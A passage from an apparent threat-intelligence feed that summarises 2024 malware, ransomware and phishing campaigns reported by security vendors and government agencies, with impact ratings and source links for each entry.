Source: https://news.sophos.com/en-us/2024/09/06/atomic-macos-stealer-leads-sensitive-data-theft-on-macos/

Intel Source:: Esentire

Intel Name:: LummaC2_Malware_and_Malicious_Chrome_Extension

Date of Scan:: 2024-09-06

Impact:: LOW

Summary:: Researchers at ESentire have identified a malware attack involving LummaC2 stealer and malicious Chrome extension called Save to Google Drive. The attack starts with drive-by download of a ZIP file containing an MSI installer which connects to C2 server to retrieve and extract a malicious DLL file. The chrome extension target users of platforms like Facebook, Coinbase and Google Pay to execute financial transactions such as cryptocurrency withdrawals. It also collects browser and device information, manipulate emails and captures screenshots. The malicious extension can alter browser behavior, divert user interactions and exploit the victim’s browser sessions for further attacks.

Source: https://www.esentire.com/blog/lummac2-malware-and-malicious-chrome-extension-delivered-via-dll-side-loading

Intel Source:: Cyble

Intel Name:: Gamaredon_Targets_Ukrainian_Military_via_LNK_Files

Date of Scan:: 2024-09-06

Impact:: MEDIUM

Summary:: Researchers from cyble have discovered an active Gamaredon campaign that uses spear-phishing emails to target Ukrainian military members. These emails include malicious XHTML attachments that, when opened, run obfuscated JavaScript code and download a malicious archive to the victim's machine. This archive contains a Windows shortcut (LNK) file that, when triggered, starts the execution of a remote .tar archive hosted on TryCloudflare[.]com using mshta.exe.

Source: https://cyble.com/blog/gamaredons-spear-phishing-assault-on-ukraines-military/

Intel Source:: Zscaler

Intel Name:: BlindEagle_Targets_Colombian_Insurance_Sector

Date of Scan:: 2024-09-05

Impact:: LOW

Summary:: Researchers at Zscaler have identified a phishing campaign where threat actor BlindEagle also known as AguilaCiega, APT-C-36 and APT-Q-98 is targeting Colombian Insurance sector to steal payment related information. This attack starts with a phishing email containing a PDF and a URL leading to a ZIP file. When user download these files from compromised Google drive which link to a regional government in Colombia that contains the malware called BlotchyQuasar is delivered to infect the user’s system. This group also target government and finance organisation in Ecuador to deploy AsyncRAT and RemcosRAT to steal banking credentials.

Source: https://www.zscaler.com/blogs/security-research/blindeagle-targets-colombian-insurance-sector-blotchyquasar

Intel Source:: Harfang Lab

Intel Name:: PackXOR_Packer

Date of Scan:: 2024-09-05

Impact:: LOW

Summary:: Harfang Lab researchers have analyzed the working and action of the PackXOR packer and its unpacking tool in detail. While PackXOR is linked to the AvNeutralizer tool, which is used to disable EDR software and is sold on underground forums by individuals connected to the FIN7 group, its usage extends beyond FIN7. PackXOR has also been employed to protect unrelated payloads, such as the XMRig cryptominer and the SilentCryptoMiner obfuscator, which are not aligned with FIN7's known tactics. This suggests that while PackXOR developers may be associated with FIN7, the packer is also used for activities outside of FIN7's operations.

Source: https://harfanglab.io/insidethelab/unpacking-packxor/

Intel Source:: CISA

Intel Name:: Russian_Threat_Actors_Target_Global_Infrastructure

Date of Scan:: 2024-09-05

Impact:: MEDIUM

Summary:: A joint advisory has been issued by the FBI, CISA, and NSA stating that cyber actors associated with Russia's GRU Unit 29155 are responsible for computer network operations against global organizations for espionage, sabotage, and reputational harm since at least 2020. These cyber actors have been using destructive malware like WhisperGate against Ukrainian organizations since January 2022. They are also targeting NATO countries, Europe, Latin America, and Central Asia, conducting activities such as defacing websites, scanning infrastructure, stealing data, and leaking it online. Their primary focus is on targeting and disrupting efforts to provide aid to Ukraine. Unit 29155 is known also for targeting critical sectors like government services, financial services, transportation, energy, and healthcare.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a

Intel Source:: Fortinet

Intel Name:: Exploitation_of_GeoServer_Vulnerability

Date of Scan:: 2024-09-05

Impact:: MEDIUM

Summary:: Fortinet researchers have identified a critical vulnerability (CVE-2024-36401) in GeoServer, an open-source software for sharing and editing geospatial data that allowed a remote code execution by unauthorized users. The vulnerability has been actively exploited by attackers through GOREVERSE malware and various botnets such as Mirai and Condi to carry out the DDOS Attacks. Attackers exploited the flaw to target industries in India, the U.S., Belgium, Thailand and Brazil. They also leveraged tools like Fast Reverse Proxy (FRP) to create encrypted tunnels, enabling them to maintain persistence in compromised environments.

Source: https://www.fortinet.com/blog/threat-research/threat-actors-exploit-geoserver-vulnerability-cve-2024-36401

Intel Source:: Adlumin

Intel Name:: Fog_Ransomware_Targets_Financial_Entities

Date of Scan:: 2024-09-05

Impact:: MEDIUM

Summary:: Adlumin researchers have discovered the Fog Ransomware which first emerged in 2021. This group primarily target sectors like education and recreation but has recently expanded to the financial services industry. The attackers use compromised VPN credentials and pass-the-hash attacks tactic to gain administrative access. Fog marks encrypted files with [.]FOG or [.]FLOCKED and leave a ransom note with instructions to negotiate on the Tor network. In recent attack a financial services company Adlumin identified a breach from Russian IP address. The attackers used compromised service to scan the network, steal login credential and map the shared drives. They used a tool called Rclone to transfer data and deployed ransomware to encrypt the files across the network.

Source: https://adlumin.com/post/fog-ransomware-now-targeting-the-financial-sector/

Intel Source:: Trend Micro

Intel Name:: Banking_Trojans_Surge_in_Latin_America

Date of Scan:: 2024-09-05

Impact:: MEDIUM

Summary:: TrendMicro researchers have seen recent developments in banking trojans, specifically focusing on Mekotio and Bbtok. Mekotio's latest variant suggests that its creators are broadening their attack scope, while BBTok employs MSBuild.exe to evade detection. The investigation indicates a rise in phishing scams targeting Latin American users. The cybercriminals behind these Trojans are increasingly using judicial-related phishing emails in addition to traditional business lures. Investigations suggest that the reach of Mekotio may soon extend beyond Latin America.

Source: https://www.trendmicro.com/en_no/research/24/i/banking-trojans-mekotio-looks-to-expand-targets--bbtok-abuses-ut.html

Intel Source:: Securelist

Intel Name:: Tusk_Campaign_Targets_with_Phishing_and_Malware

Date of Scan:: 2024-09-05

Impact:: LOW

Summary:: Researchers from Kaspersky Lab have discovered a advanced campaign known as "Tusk," which is led by Russian-speaking cybercriminals. This campaign is made up of multiple smaller businesses that look like actual projects, with just minor branding and name modifications. The attackers win victims' trust through social media and utilize Dropbox to host malicious files that deliver malware such as DanaBot and StealC.

Source: https://securelist.ru/tusk-infostealers-campaign/110460/

Intel Source:: Securelist

Intel Name:: Tropic_Trooper_Spies_on_Middle_Eastern_Governments

Date of Scan:: 2024-09-05

Impact:: MEDIUM

Summary:: Researchers at Securelist discovered new DLL search-order hijacking implants that are loaded from a legitimate vulnerable executable because it lacks the full path specification to the required DLL. The goal of this attack chain was to load the Crowdoor loader, which is half-named after the SparrowDoor backdoor. When the security agent stopped the initial Crowdoor loader during the attack, the attackers were forced to move to a new, undisclosed form that had nearly the same effect.

Source: https://securelist.com/new-tropic-trooper-web-shell-infection/113737/

Intel Source:: Group-IB

Intel Name:: Lazarus_Group_Targets_Job_Seeker

Date of Scan:: 2024-09-04

Impact:: MEDIUM

Summary:: Group-IB researchers have uncovered a campaign called Contagious Interview, executed by the Lazarus Group which targets job seekers. This campaign tricks users into downloading malicious software that contains the BeaverTail malware which has versions for both macOS and Windows and can deliver a Python backdoor known as InvisibleFerret. The group has expanded its reach beyond LinkedIn to other platforms such as WWR, Moonlight and Upwork to lure blockchain professionals . They often move the conversation to Telegram where they ask interviewees to download a video conferencing app or a Node.js project to perform a technical task as part of the interview process. The group has also cloned legitimate video conferencing apps such as FCCCall by using fake websites like freeconference[.]io to infect victims.

Source: https://www.group-ib.com/blog/apt-lazarus-python-scripts/

Intel Source:: James_inthe_box

Intel Name:: August24_Malspam_Campaigns

Date of Scan:: 2024-09-04

Impact:: MEDIUM

Summary:: August 2024 Malspam Campaigns

Source: https://gist.github.com/silence-is-best/252f23cff687506a22f36b6286794b23

Intel Source:: Securelist

Intel Name:: Mallox_Ransomware

Date of Scan:: 2024-09-04

Impact:: MEDIUM

Summary:: Researchers at Securelist have identified the ransomware group called Mallox which has first appeared in 2021. This group operates as a Ransomware-as-a-Service (RaaS) and uses complex encryption methods to lock victims files. The ransomware communicates with a C2 server and deploys the Remcos RAT for remote access, using PowerShell scripts to download and execute its ransomware payload. This group has a data leak site where they publish the data if ransom is not paid. Brazil, Vietnam and China are primary targets of Mallox ransomware although its affiliates attack companies globally.

Source: https://securelist.com/mallox-ransomware/113529/

Intel Source:: Cyfirma

Intel Name:: Taliban_Stealer

Date of Scan:: 2024-09-04

Impact:: LOW

Summary:: Researchers at Cyfirma have identified a website advertising a tool named Taliban Stealer. Once executed, the tool offers the user to choose which types of data to extract from their machine, including passwords, cookies, and cryptocurrency wallets. Additionally, it installs various other types of generic malware, modifies Windows Defender settings to exclude specific directories, bypasses PowerShell execution policy, as well as performs CMSTP to UAC bypass.

Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_cyfirma-researchers-have-discovered-a-website-activity-7236694013284691968-M6LO/?utm_source=share&utm_medium=member_ios

Intel Source:: Trend Micro

Intel Name:: Analysing_KTLVdoor_Backdoor

Date of Scan:: 2024-09-04

Impact:: LOW

Summary:: Researchers from Trend Micro have found a new multiplatform backdoor called KTLVdoor, which is created by the Chinese-speaking threat actor Earth Lusca. This malware is written in Golang and targets both Microsoft Windows and Linux systems. KTLVdoor is mainly obfuscated and disguises itself as system procedures, allowing attackers to perform file modification, command execution, and remote port scanning.

Source: https://www.trendmicro.com/en_us/research/24/i/earth-lusca-ktlvdoor.html

Intel Source:: Google/Mandiant

Intel Name:: The_Examination_of_Web3_Heists

Date of Scan:: 2024-09-04

Impact:: LOW

Summary:: Mandiant researchers have investigated and uncovered a sophisticated social engineering tactic used by DPRK threat actors to compromise systems. The attackers use fake job recruitment scenarios to deliver malware. In one case, an engineer received a ZIP file disguised as a Python coding challenge, which contained COVERTCATCH malware. It infected a macOS system and deployed additional malicious software via Launch Agents and Launch Daemons. Similarly, Finance personnel are targeted with a fake job offer for a high-profile position, which includes a malicious PDF. The PDF installed RUSTBUCKET, a Rust-based backdoor that collects system information and communicates with a command-and-control server, persisting through a disguised Launch Agent.

Source: https://cloud.google.com/blog/topics/threat-intelligence/examining-web3-heists/

Intel Source:: ANY.RUN

Intel Name:: Technical_Analysis_of_AZORult_Malware

Date of Scan:: 2024-09-04

Impact:: LOW

Summary:: AZORult is a sophisticated malware designed to steal credentials and payment card information, and can also function as a downloader for various other malware families. Version 2 of AZORult added support for .bit domains, enhancing its capabilities. It has been seen operating with Chthonic and deployed by the Ramnit malware family. Initially developed in Delphi, the malware was ported to C++ in 2019, reflecting its increased complexity and evolution over time.

Source: https://any.run/cybersecurity-blog/azorult-malware-analysis/

Intel Source:: Cyble

Intel Name:: Babylon_RAT_Campaign

Date of Scan:: 2024-09-04

Impact:: LOW

Summary:: Cyble researchers have discovered a cyber-attack targeting political figures and government officials in Malaysia. This attack has been active since July and the attackers deploy multiple malicious ISO files to compromise Malaysian entities. These files contain various malicious components such as shortcut (LNK) file, a hidden PowerShell script, a malicious executable and a decoy PDF. Their primary objective is to deliver the Babylon RAT, an open-source RAT which gives the attackers remote control over the compromised system and access to sensitive data. The RAT also makes changes to the system to ensure it remains active even after restarting the computer.

Source: https://cyble.com/blog/the-intricate-babylon-rat-campaign-targets-malaysian-politicians-government/

Intel Source:: Cisco Talos

Intel Name:: MacroPack_Exploited_in_Global_Malware_Campaign

Date of Scan:: 2024-09-03

Impact:: MEDIUM

Summary:: Researchers from Cisco Talos have discovered that attackers are misusing a tool called MacroPack, which is often used for security testing, to distribute malicious software. Between May and July 2024, they discovered many malicious Microsoft Office documents uploaded to VirusTotal from nations including China, Pakistan, Russia, and the United States. These papers were used to distribute malicious software such as Havoc and Brute Ratel, as well as a new version of the PhantomCore remote access trojan (RAT).

Source: https://blog.talosintelligence.com/threat-actors-using-macropack/

Intel Source:: Truesec

Intel Name:: Cicada3301_Ransomware

Date of Scan:: 2024-09-03

Impact:: MEDIUM

Summary:: Truesec researchers have identified the Cicada3301 group, a ransomware-as-a-service provider, launched their platform on June 29, 2024, following their first data leak on June 25. The ransomware, written in Rust, targeting both Windows and Linux/ESXi systems.

Source: https://www.truesec.com/hub/blog/dissecting-the-cicada

Intel Source:: K7 Security Labs

Intel Name:: Luxy_A_Stealer_and_A_Ransomware

Date of Scan:: 2024-09-03

Impact:: LOW

Summary:: K7 researchers have discovered a malware called Luxy that has both data-stealing and ransomware capabilities. Luxy tries to steal passwords, browser details and cryptocurrency wallet information from the victim's computer similar another malware called Umbral Stealer. It operates in multiple stages such as blocking access to certain websites, stealing sensitive data, and encrypting files on the victim's computer for demanding a ransom to unlock the files.

Source: https://labs.k7computing.com/index.php/luxy-a-stealer-and-a-ransomware-in-one/

Intel Source:: Bfore AI

Intel Name:: Global_Phishing_Scam_Targets_Canadian_Pizza_Chains

Date of Scan:: 2024-09-03

Impact:: LOW

Summary:: Researchers at BforeAI have uncovered a phishing campaign targeting well-known international pizza chains that leads to financial losses for customers. This campaign began in Singapore where attackers created fake Domino's Pizza website like domino-plza[.]com to scam with customers. The attackers also use paid search engine ads to ensure their fake websites appears at the top of search results for making it easier to trick people. After Singapore, the same group target Canadian Pizza chains such as PizzaPizza, Little Caesars Pizza, Blaze Pizza, 241 Pizza, Panago Pizza, and Boston Pizza. They create fake domains that mimic legitimate to trick customer into providing card detail which the scammers then use for unauthorized transactions called carding.

Source: https://bfore.ai/international-pizza-chain-domain-spoofing-report/

Intel Source:: CERT-AGID

Intel Name:: Unmasking_Vidar_Malware_Via_PEC_Emails

Date of Scan:: 2024-09-03

Impact:: LOW

Summary:: Researchers from CERT-AgID have detected a third malicious campaign in less than a month, this time distributing Vidar malware via compromised PEC emails. These fake emails fraudulently submit an unpaid invoice and threaten legal action to lure recipients into clicking a link that downloads a malicious JavaScript code. This file then triggers the download of other malicious scripts.

Source: https://cert-agid.gov.it/news/vidar-insiste-in-italia-con-campagne-via-pec/

Intel Source:: Hunt.IO

Intel Name:: Latrodectus_Malware_Disguised_as_AhnLab_Software

Date of Scan:: 2024-09-03

Impact:: LOW

Summary:: Hunt.IO researchers have uncovered a C2 server associated with Latrodectus malware which communicates with a malicious file named MeDExt.dll that functions as a downloader. This malware operates as a backdoor, allowing attackers to execute remote commands, gather information from compromised systems and deploy additional payloads including Brute Ratel C4. The MeDExt.dll file mimics a legitimate file from AhnLab security software to bypass the security devices, this shows attacker either targets victims using AhnLab services or bundled the legitimate software with the malware.

Source: https://hunt.io/blog/latrodectus-malware-masquerades-as-ahnlab-security-software-to-infect-victims

Intel Source:: Fortinet

Intel Name:: Emansrepo_Stealer

Date of Scan:: 2024-09-03

Impact:: LOW

Summary:: Researchers at FortiGuard have identified a new Python-based infostealer called Emansrepo that is distributed through phishing emails containing fake purchase orders and invoices. This infostealer has been active since November 2023 and steals sensitive information from victims by compressing data from their browsers and specific file locations into a zip file and then sending it to the attacker via email. The malware is packaged so it can run on a computer even if Python isn't installed.

Source: https://www.fortinet.com/blog/threat-research/emansrepo-stealer-multi-vector-attack-chains

Intel Source:: Cyble

Intel Name:: Ransomware_Gangs_Supported_by_Iranian_Hackers

Date of Scan:: 2024-09-03

Impact:: MEDIUM

Summary:: Researchers from Cyble have discovered that Iranian state-sponsored hacking groups, including "Pioneer Kitten" and "Lemon Sandstorm," are progressively targeting critical infrastructure sectors in the United States and its allies, such as education, finance, healthcare, and defense. These groups have evolved into access brokers for ransomware gangs, selling access to infected networks and conducting espionage for the Iranian government.

Source: https://cyble.com/blog/iranian-state-sponsored-hackers-have-become-access-brokers-for-ransomware-gangsca/

Intel Source:: STR

Intel Name:: Potential_C2_Seeder_Queries_09022024

Date of Scan:: 2024-09-03

Impact:: MEDIUM

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: https://github.com/str-int-repo/str-seeder-behavior-queries

Intel Source:: Checkmarx

Intel Name:: Malicious_NPM_Packages_Target_Roblox_Users

Date of Scan:: 2024-09-02

Impact:: LOW

Summary:: Researchers at Checkmarx have identifed a malware campaign targeting Roblox developers through the distribution of infected NPM packages claiming to be the popular ‘noblox.js’ library. Such packages are developed to harvest and/or compromise data and systems and rely on the openness of the open-source model for distribution. The Roblox platform, with its massive user base of over 70 million daily users, has been a primary target.

Source: https://checkmarx.com/blog/year-long-campaign-of-malicious-npm-packages-targeting-roblox-users/

Intel Source:: Palo Alto

Intel Name:: Emerging_Threats_in_New_TLDs

Date of Scan:: 2024-09-02

Impact:: LOW

Summary:: Researchers from PaloAlto have observed new domain types and found that attackers are exploiting them for phishing, spreading unwanted programs, and other malicious activities. These attackers keep an eye on new domain types to exploit, particularly if they look similar associated file types, such as.zip.

Source: https://unit42.paloaltonetworks.com/tracking-newly-released-top-level-domains/

Intel Source:: Cyfirma

Intel Name:: PowerShell_Keylogger

Date of Scan:: 2024-09-02

Impact:: LOW

Summary:: Researchers at Cyfirma have identified a new keylogger that run through a PowerShell Script that capture every keystroke on a compromised machine including password and credit card details. It operates through an advance technique without direct user interaction and collects files and directories, system information and cryptographic settings. The keylogger also captures screenshots and communicate with an attacker through a cloud server as proxy in Finland and Tor network to ensure the attacker remains undetected.

Source: https://www.cyfirma.com/research/cyfirma-research-powershell-keylogger/

Intel Source:: PaloAlto

Intel Name:: SEO_Poisoned_WikiLoader_Targets_VPN_Users

Date of Scan:: 2024-09-02

Impact:: MEDIUM

Summary:: Researchers from PaloAlto Networks have found a new variant of the WikiLoader malware, which is being distributed through SEO poisoning and impersonating their GlobalProtect VPN software. The Advanced WildFire reverse engineering team completed an investigation, discovering the most recent evasion techniques used by WikiLoader and providing new insights into its evolution.

Source: https://unit42.paloaltonetworks.com/global-protect-vpn-spoof-distributes-wikiloader/

Intel Source:: Securelist

Intel Name:: Head_Mare_Targeting_Russian_Firms_with_Ransomware

Date of Scan:: 2024-09-02

Impact:: MEDIUM

Summary:: Head Mare is a hacktivist group that emerged in 2023 and attracted the attention of X (formerly Twitter) by publishing information about their victims, including organizational details and internal stolen documents. They focus exclusively on Russian and Belarusian companies, utilizing phishing campaigns to distribute RAR archives that exploit the CVE-2023-38831 vulnerability in WinRAR. Their attacks consist of tools identified with other groups and they use LockBit ransomware for Windows and Babuk Ransomware for Linux (ESXi) systems.

Source: https://securelist.com/head-mare-hacktivists/113555/

Intel Source:: BI Zone

Intel Name:: Stone_Wolf_Employs_Meduza_Stealer

Date of Scan:: 2024-09-02

Impact:: LOW

Summary:: BI Zone researchers have uncovered a phishing campaign by the group Stone Wolf, which sends emails that appear to come from a legitimate industrial automation provider. The attackers use brand logos and visual identities to make their emails seem legitimate, aiming to deliver Medusa Stealer. They distribute a malicious archive that, when opened, downloads and executes a file from a remote server. Once installed, the malware steals sensitive information, including browser, email, and crypto wallet credentials, as well as system details like device name, time zone, and public IP address. If the malware can't connect to its command server, it terminates.

Source: https://bi.zone/eng/expertise/blog/stone-wolf-atakuet-rossiyskie-kompanii-stilerom-meduza/

Intel Source:: SOC Radar

Intel Name:: Abyss_Ransomware

Date of Scan:: 2024-09-02

Impact:: MEDIUM

Summary:: SOC Radar researchers have identified a new group called Abyss Ransomware also known as Abyss Locker which has appeared in 2023. This group mainly targets various sector such as finance, manufacturing, healthcare and IT. Initially, they focused on Windows systems but later expanded to Linux environments, especially VMware ESXI virtualized platforms. This group gains access to its targets through phishing emails, weak SSH configurations, or by exploiting known server vulnerabilities and they use brute-force attacks on SSH in Linux environments. Abyss Ransomware mainly targets U.S. but also affects other countries like UK, Canada, Germany, Hongkong etc.

Source: https://socradar.io/dark-web-profile-abyss-ransomware/

Intel Source:: Palo Alto

Intel Name:: Deepfake_Scam_Campaign

Date of Scan:: 2024-08-30

Impact:: LOW

Summary:: Palo Alto researchers have discovered various scam campaigns using deepfake videos of well-known public figures like CEO. news anchors and government officials. These campaigns appear in English, Spanish, French, Italian, Turkish, Czech and Russian to target people in countries like Canada, Mexico, France, Italy, Turkey, Czechia, Singapore, Kazakhstan and Uzbekistan. These scams usually promote fake investment opportunities or government giveaways. One example is the Quantum AI scam in these campaigns to create deep fake videos like Elon Musk to promote a fake investment platform. These campaigns often trick people into providing personal information on scam websites and then try to steal their money.

Source: https://unit42.paloaltonetworks.com/dynamics-of-deepfake-scams/

Intel Source:: Fortinet

Intel Name:: An_Overview_of_Undergroud_Ransomware

Date of Scan:: 2024-08-30

Impact:: MEDIUM

Summary:: Researchers at Fortinet have discovered a group called Underground Ransomware that first emerged in July 2023. This ransomware targets Windows machine and demand a ransom for their decryption through ransom notes. It believes Russia based RomCom group also known as Storm-0978 is behind this ransomware. This group is known for exploiting vulnerabilities, using phishing emails and buying access from other hackers to spread the ransomware. The Underground group maintains a data leak site where they post information about their victims and the data stolen from 16 victims. They also operate a Telegram channel called Underground Team.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-underground

Intel Source:: Cyfirma

Intel Name:: Mekotio_Trojan

Date of Scan:: 2024-08-30

Impact:: LOW

Summary:: Cyfirma researchers have identified a malware named Mekotio Trojan which uses the PowerShell to spread and execute its payload to compromise machine. This malware is difficult to detect because it uses custom XOR decryption techniques to hide its activities. It gathers information about the system, connects to a remote server to receive further instructions and ensure that malicious files stay active to continuously carry out its harmful tasks.

Source: https://www.cyfirma.com/research/analyzing-the-mekotio-trojan/

Intel Source:: Esentire

Intel Name:: AsyncRAT_and_Infostealer_Spread_Via_Phishing_Emails

Date of Scan:: 2024-08-30

Impact:: LOW

Summary:: ESentire researchers have discovered an attack involving AsyncRAT malware which was delivered through phishing email with a malicious file. This file appears as a legitimate document named Summary Form which contains an HTML character and retrieves a VBScript that downloads a file disguised as an image. These scripts download additional malicious scripts to set up a scheduled task to install AsyncRAT, including an infostealer plugin that targets popular web browsers like Chrome, Firefox, and Edge to steal sensitive information.

Source: https://www.esentire.com/blog/exploring-asyncrat-and-infostealer-plugin-delivery-through-phishing-emails

Intel Source:: Google Mandiant

Intel Name:: Weaponized_Digital_Analytics_Tools

Date of Scan:: 2024-08-30

Impact:: LOW

Summary:: Mandiant highlights the ways cyber attackers are repurposing digital analytics platforms like link shorteners, IP geolocation utilities, and CAPTCHA tools to evade detection and enhance their malicious campaigns. By using these tools, attackers can obscure URLs, track infection spread, tailor attacks to specific regions, and block automated threat analysis, ultimately making their operations more effective.

Source: https://cloud.google.com/blog/topics/threat-intelligence/how-attackers-weaponize-digital-analytics-tools/

Intel Source:: Microsoft

Intel Name:: Citrine_Sleet_exploiting_Chromium_zero_day

Date of Scan:: 2024-08-30

Impact:: MEDIUM

Summary:: Microsoft researchers have discovered a vulnerability known as CVE-2024-7971 in Chromium browsers which was exploiting by North Korean threat actor called Citrine Sleet to gain remote code execution. This group primarily targets organizations in the cryptocurrency sector for financial gain. Exploiting this vulnerability could allow attackers to run malicious code within the Chromium browser which is used in popular browsers like Google Chrome that means they can run their own code on the victim’s device without permission.

Source: https://www.microsoft.com/en-us/security/blog/2024/08/30/north-korean-threat-actor-citrine-sleet-exploiting-chromium-zero-day/

Intel Source:: Trend Micro

Intel Name:: Godzilla_Backdoors_Hit_Atlassian_Confluence

Date of Scan:: 2024-08-30

Impact:: LOW

Summary:: Researchers from Trend Micro have discovered a new attack vector that exploits CVE-2023-22527 in Atlassian Confluence. This exploit uses the Godzilla webshell, an advanced fileless backdoor that employs AES encryption and avoids detection by remaining in memory. This reveals the importance of regular patching and better security protocols.

Source: https://www.trendmicro.com/en_us/research/24/h/godzilla-fileless-backdoors.html

Intel Source:: Linkedin

Intel Name:: Analysis_of_Beast_Ransomware

Date of Scan:: 2024-08-30

Impact:: LOW

Summary:: Beast Ransomware came into existence in May 2024, which is very different from the situation that existed in October 2023 and it appends the .BEAST extension to encrypted files. Unlike most of the other ransomware groups, Beast has not yet (but most likely will very soon) put out a data leak site (DLS) on the Dark Web. It could be traced to the LockBit Ransomware Builder as some of the traitor samples are in the Black LockBit category. The Lockbit builder was exposed in September 2022.

Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_ransomware-beast-infosec-activity-7234810048307154945-rsBj/?utm_source=share&utm_medium=member_ios

Intel Source:: Proofpoint

Intel Name:: Voldemort_Targets_with_Novel_Tactics

Date of Scan:: 2024-08-30

Impact:: MEDIUM

Summary:: Proofpoint researchers have identified a sophisticated cyberattack campaign deploying custom malware named Voldemort. The attack chain consists of several techniques that are currently common in the threat environment in addition to unusual command and control (C2) methods such as using Google Sheets. It is noteworthy for its use of tactics, techniques, and procedures (TTPs), luring themes that pose as foreign government agencies, odd file names, and passwords such as "test."

Source: https://www.proofpoint.com/us/blog/threat-insight/malware-must-not-be-named-suspected-espionage-campaign-delivers-voldemort

Intel Source:: Akamai

Intel Name:: Corona_Mirai_Botnet

Date of Scan:: 2024-08-30

Impact:: LOW

Summary:: Akamai researchers have uncovered a botnet campaign exploiting a zero-day vulnerability (CVE-2024-7029) in the brightness function of AVTECH CCTV cameras that allows remote code execution. Once the vulnerability is exploited, the botnet spreads a variant of the Mirai malware known as Corona Mirai which can be executed with privilege access. The botnet is also exploiting several older vulnerabilities, including those in Huawei devices and Hadoop YARN, taking advantage of unpatched security flaws that attackers often target.

Source: https://www.akamai.com/blog/security-research/2024-corona-mirai-botnet-infects-zero-day-sirt

Intel Source:: Netskope

Intel Name:: Latrodectus_Rapid_Evolution

Date of Scan:: 2024-08-30

Impact:: MEDIUM

Summary:: Latrodectus, a malware downloader initially discovered in 2023, shares similarities with IcedID and has evolved rapidly. Delivered primarily via spam campaigns by TA577 and TA578, it downloads and executes additional payloads, collects system info, and more. The latest version, 1.4, includes updates such as enhanced string obfuscation with AES256 encryption, a new command-and-control (C2) endpoint, and two new backdoor commands for executing shellcode and downloading files.

Source: https://www.netskope.com/blog/latrodectus-rapid-evolution-continues-with-latest-new-payload-features

Intel Source:: Mandiant, Google Cloud Blog

Intel Name:: Iranian_Counterintelligence_Operation

Date of Scan:: 2024-08-29

Impact:: LOW

Summary:: Mandiant researchers have discovered an Iranian counterintelligence campaign targeting Farsi-speaking individuals utilizing fake recruitment websites impersonating Israel-based human resources organizations. The effort targeted collecting personal information in order to identify Iranians who collaborated with foreign intelligence, mainly Israel. The operation, which is possibly linked to APT42, lasted from 2017 to March 2024. Mandiant stopped the actions by terminating the threat actor's accounts.

Source: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-iranian-counterintelligence-operation

Intel Source:: Securonix Threat Labs

Intel Name:: SLOWTEMPEST_Campaign

Date of Scan:: 2024-08-29

Impact:: MEDIUM

Summary:: Securonix researchers have uncovered a covert cyberattack campaign called SLOW#TEMPEST that targets Chinese speaking users. The attackers send a phishing email with zip files to deliver Cobalt Strike. These zip files are password protected which contains word document and when user open this file it triggers the malicious code. The campaign specifically targets users in China because Chinese language is being used in file names and C2 servers are hosted by a Chinese company named Shenzhen Tencent. The attackers spread through the network using RDP and other tools to find open ports and gather information. They also use a tool called Mimikatz to extract Windows passwords and log into systems remotely to avoid detection.

Source: https://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/

Intel Source:: Hyas

Intel Name:: Fake_Political_Sites_Exploit_US_Election

Date of Scan:: 2024-08-29

Impact:: LOW

Summary:: Researchers from Hyas have revealed that attackers are using the fake domains, like actsblue[.]com, to mimic legitimate political donation sites during the US election, making it difficult to trace the attackers due to the usage of anonymous registration services.

Source: https://www.hyas.com/blog/special-bulletin-us-election-phishing-alert

Intel Source:: CISA

Intel Name:: RansomHub_Ransomware_Updates

Date of Scan:: 2024-08-29

Impact:: MEDIUM

Summary:: A joint advisory has been issued by FBI, CISA, MS-ISAC and HHS about a ransomware group called RansomHub formerly known as Cyclops and Knight. This group has been active since Feb 2024 and operate as ransomware-as-a-service that provides tool to their affiliates to carry out the attacks. This group has targeted 210 victims across various sectors including IT, government services, financial services, healthcare, food and agriculture and critical manufacturing. RansomHub uses a double-extortion tactic to encrypt the victim’s data to demand a ransom and tell them to contact through a special website [.] onion on the dark web. Victims are given limited time to pay the ransom before their data is published online.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-242a

Intel Source:: Trend Micro

Intel Name:: Fake_Palo_Alto_Tool_Targets_Middle_East_Users

Date of Scan:: 2024-08-29

Impact:: MEDIUM

Summary:: Researchers from Trend Micro have identified that threat actors are targeting people in the Middle East using malware disguised as the Palo Alto GlobalProtect tool. This malware uses a two-step infection process, infecting with a setup.exe file and communicating with the Interactsh project. It is capable of running remote PowerShell commands, exfiltrating files, encrypting communications, and bypassing sandbox solutions, representing a significant threat to targeted organizations.

Source: https://www.trendmicro.com/en_us/research/24/h/threat-actors-target-middle-east-using-fake-tool.html

Intel Source:: Ontinue

Intel Name:: New_Analysis_and_Insights_of_LummaC2

Date of Scan:: 2024-08-29

Impact:: LOW

Summary:: Ontinue researchers have revealed an increase in activity involving the LummaC2 infostealer. This type of attack submission explores another variant of LummaC2, first found as a series of PowerShell commands and ended with the successful installation of malware. The analysis details the various stages of the malware operation, from the initial PowerShell command to the decryption and execution of the payload, offering insights into the attackers' tactics, techniques, and procedures (TTPs).

Source: https://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/

Intel Source:: Google TAG

Intel Name:: State_Hackers_and_Vendors_Reusing_Exploits

Date of Scan:: 2024-08-29

Impact:: LOW

Summary:: Google's Threat Analysis Group (TAG) uncovered multiple exploit campaigns targeting Mongolian government websites from November 2023 to July 2024. These attacks, attributed to the Russian-backed APT29 group, used n-day exploits to compromise iOS and Android devices via watering hole techniques. Notably, the attackers employed exploits previously used by commercial surveillance vendors Intellexa and NSO Group, raising concerns about the crossover between state-backed and commercial exploitation. Despite the vulnerabilities being patched, the attacks continued to affect unpatched devices.

Source: https://blog.google/threat-analysis-group/state-backed-attackers-and-commercial-surveillance-vendors-repeatedly-use-the-same-exploits/

Intel Source:: Phylum

Intel Name:: Malicious_NPM_Packages_Linked_to_North_Korea

Date of Scan:: 2024-08-29

Impact:: LOW

Summary:: Researchers at Phylum have detected a recent increase in malicious activity associated with North Korean threat actors within the npm ecosystem. This uptick, observed starting August 12, 2024, began with the release of the `temp-etherscan-api` package and two versions of `etherscan-api`. About a week and a half later, the `telegram-con` package and another version of `etherscan-api` were published. The surge appears to involve multiple groups or demonstrates various publication patterns, tactics, techniques, and procedures (TTPs), and attack methods that have been previously seen.

